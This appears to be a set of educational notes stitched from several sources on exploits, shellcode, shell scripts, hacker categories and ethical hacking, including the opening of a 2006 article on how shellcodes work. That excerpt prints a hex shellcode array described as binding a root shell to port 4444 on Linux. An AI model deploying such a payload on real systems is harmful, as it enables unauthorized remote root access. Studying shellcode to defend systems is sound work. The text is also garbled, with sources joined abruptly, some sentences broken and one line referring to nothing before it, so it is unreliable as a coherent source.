What does exploit mean?

An exploit is the use of software, data, or commands to “exploit” a weakness in a computer

system or program to carry out some form of malicious intent, such as a denial-of-service
attack, Trojan horses, worms or viruses. The weakness in the system can be a bug, a glitch
or simply a design vulnerability. A remote exploit exploits the security vulnerability without
ever having prior access to the system. A local exploit needs prior access to the vulnerable
system and usually involves increasing the privileges of the user account running the
exploit. Those who utilize exploits often use social engineering to gain critical information
needed to access the system. Many crackers (or hackers) take pride in their knowledge of
software exploits and post them to a website to share or boast with other crackers. Web
browsers and media players are often targets by crackers since they both have access to
system information and can download files from the internet. Patches (or “fixes”) are
intended to remedy these vulnerabilities as soon as they are revealed and are often
distributed in software updates.  Hence, it is vital to keep your software up-to-date in order
to make sure that all known vulnerabilities patched.  A zero-day exploit is one that the
software’s creator has not yet discovered.  To prevent losing data because of an attack
taking advantage of an exploit, is a good idea to keep regular backups of your data saved
on your computer.

Shellcode

A shellcode is a set of commands usually programmed in assembly language and translated into

opcodes (set of hexadecimal values) that are usually injected into the stack (or stack) of a program
to get the machine on which it resides to run. operation that has been programmed.

Malware programming code that is injected covertly into the computer. The term originated from
code that activates a command shell to exploit the computer (see command processor) but may
refer to any machine language embedded in data that is used to compromise either the local
machine or a remote machine. "English shellcode" intersperses bits and pieces of command
statements within a large segment of normal English text. The pieces are decoded into formal shell
commands by a Trojan. See shell script.

shell script

A file of executable Unix commands that is created in a text editor. When the file is run, each
command is executed until the end of the file is reached. After the shell script is written, it is made
usable by changing its file status to "executable" with the Unix chmod (change mode) command
(see chmod).

Shell scripts are the Unix counterpart to Windows scripts and Windows/DOS batch files.
See Windows Script Host, PowerShell and batch file abc's.
How Shellcodes Work
by Peter Mikhalenko
05/18/2006 

It's not an easy task to find a vulnerable service and find an exploit for it. It's also not easy to defend against users
who might want to exploit your system, if you are a system administrator. However, writing an exploit by yourself, to
convert a news line from bug tracker into a working lockpick, is much more difficult. This article is not a guide on
writing exploits, nor an overview of popular vulnerabilities. This is a step-by-step guide on developing a shellcode, a
crucial point of any exploit software. Hopefully, learning how they work will help conscientious and respectable
developers and system administrators to understand how malefactors think and to defend their systems against
them.

How an Exploit Works

Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and
examine its source code. Find the most unintelligible piece of the code; it will be there, for sure. Most probably, you
will find a several lines of strange and unrelated symbols; something like this:

char shellcode[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a"
"\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d"
"\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4"
"\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04"
"\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe"
"\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f"
"\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67";

This is shellcode, also sometimes referred to as "bytecode." Its content is not a magic word or random symbols. This
is a set of low-level machine commands, the same as are in an executable file. This example shellcode opens port
4444 on a local Linux box and ties a Bourne shell to it with root privileges. With a shellcode, you can also reboot a
system, send a file to an email, etc. The main task for an exploit program is therefore to make this shellcode work.

Take, for example, a widely known error-buffer overflow. Developers often check data that has been received as
input for functions. A simple example: the developer creates a dynamic array, allocates for it 100 bytes, and does not
control the real number of elements. All elements that are out of the bounds of this array will be put into a stack, and
a so-called buffer overflow will occur. An exploit's task is to overflow a buffer and, after that, change the return
address of system execution to the address of the shellcode. If a shellcode can get control, it will be executed. It's
pretty simple.

As I already said, this article is not a guide for writing exploits. There are many repositories with existing shellcodes
(shellcode.org, Metasploit); however, it is not always enough. A shellcode is a low-level sequence of machine
commands closely tied to a dedicated processor architecture and operating system. This is why understanding how it
works can help prevent intrusions into your environment.

What Is It For?

To follow along, I expect you to have at least minimal assembly knowledge. As a platform for experiments, I chose
Linux with a 32-bit x86 processor. Most exploits are intended for Unix services; therefore, they are of most interest.
You need several additional tools: Netwide Assembler (nasm), ndisasm, and hexdump. Most Linux distributions
include these by default.
Shellcode is basically a list of carefully crafted instructions that can be
executed once the code is injected into a running application. Stack and heap-
based buffer overflows are the most popular way of doing so.

The term shellcode literally refers to written code that starts a command shell.
The most common shellcode instruction is to execute a shell such as /bin/sh,
or cmd.exe. The only possible reason for launching such commands is to take
control or exploit a compromised machine.

So to answer your question: yes, shellcode is always considered exploit code.

Nowadays, shellcode refers to any byte code that can be inserted into an
exploit to accomplish a particular objective. Other common shellcode
objectives include adding a root user account to a system, or performing a
reverse telnet back to the attacker's machine.

Most people think hackers have extraordinary skill and knowledge that

allow them to hack into computer systems and find valuable

information.

In a cyber security world, the person who is able to discover weakness

in a system and managed to exploit it to accomplish his goal ,referred

as a Hacker , and the process is referred as Hacking. Now a days, People started
thinking that hacking is only hijacking Facebook accounts or defacing websites. Yes, it is
also part of

hacking field but it doesn’t mean that it is the main part of hacking.

Who is Hacker?

A "Hacker" is the opposite: someone who never goes to class, who in fact

sleeps all day, and who spends the night pursuing recreational

activities rather than studying text books.

Let's explain about different kind of hackers exists in the cyber

security world.
Script Kiddie:-Script Kiddies are the persons who use tools , scripts, methods and

programs created by real hackers. In a simple word, the one who

doesn’t know how a system works but still able to exploit it with

previously available tools.

White Hat Hacker:-White Hat hackers are good guys who does the hacking for
defense.

The main aim of a Whitehat hacker is to improve the security of a

system by finding security flaws and fixing it. They work for an

organization or individually to make the cyber space more secure. Break The Security
only concentrates on white-hat hacking and help you to learn the Ethical Hacking world.

Black Hat Hacker:-BlackHat hackers are really bad guys , cyber criminals , who have

malicious intent. The hackers who steal money, infect systems with

malware, etc..are referred as BlackHat hackers. They use their

hacking skills for illegal purposes.

GreyHat hackers:-The hackers who may work offensively or defensively, depending

on the

situation. Hackers who don’t have malicious intentions but still like

to break into third-party system for fun or just for showing the

existence of vulnerability.

Hacktivists:-The hackers who use their hacking skills for protesting against

injustice and attack a target system and websites to bring the

justice. One of the popular hacktivists is Anonymous and RedHack.

What is Ethical Hacking?

Ethical hacking — also known as penetration testing or white-hat

hacking — involves the same tools, tricks, and techniques that hackers

use, but with one major difference: Ethical hacking is legal. Ethical

Hacking is performed with the target’s permission. The intent of

ethical hacking is to discover vulnerabilities from a hacker’s

viewpoint so systems can be better secured. It’s part of an overall

information risk management program that allows for ongoing security improvements.
Ethical hacking can also ensure that vendor’s claims

about the security of their products are legitimate.

Purpose of Ethical Hacking & its Skill Set!!

When i tell people that I am an ethical hacker, I usually hear

snickers and comments like “Hacker(danger).” Many people ask, “Can hacking

be ethical?” Yes! That best describes what I do as a security

professional. I use the same software tools and techniques as

malicious hackers to find the security weakness in computer networks

and systems. Then I apply the necessary fix or patch to prevent the

malicious hacker from gaining access to the data. This is a never-

ending cycle as new weaknesses are constantly being discovered in computer systems
and patches are created by the software vendors to

mitigate the risk of attack.

Ethical hackers are usually security professionals or network penetration testers who
use their hacking skills and toolsets for

defensive and protective purposes. Ethical hackers who are security professionals test
their network and systems security for vulnerabilities using the same tools that a hacker
might use to compromise the network. Any computer professional can learn the skills of
ethical hacking.

Goals of Ethical Hacker

Whether perpetuated by an ethical hacker or malicious hacker, all attacks are an

attempt to breach computer system security. Security consists of four basic elements:

Confidentiality

Authenticity

Integrity

Availability
SKILL SETS

Ethical hackers who stay a step ahead of malicious hackers must be computer systems
experts who are very knowledgeable about computer programming, networking, and
operating systems. In-depth knowledge about highly targeted platforms (such as
Windows, Unix, and Linux) is also a requirement. Patience, persistence, and immense
perseverance are important qualities for ethical hackers because of the length of time
and level of concentration required for most attacks to pay off. Networking, web
programming, and database skills are all useful in performing ethical hacking and
vulnerability testing.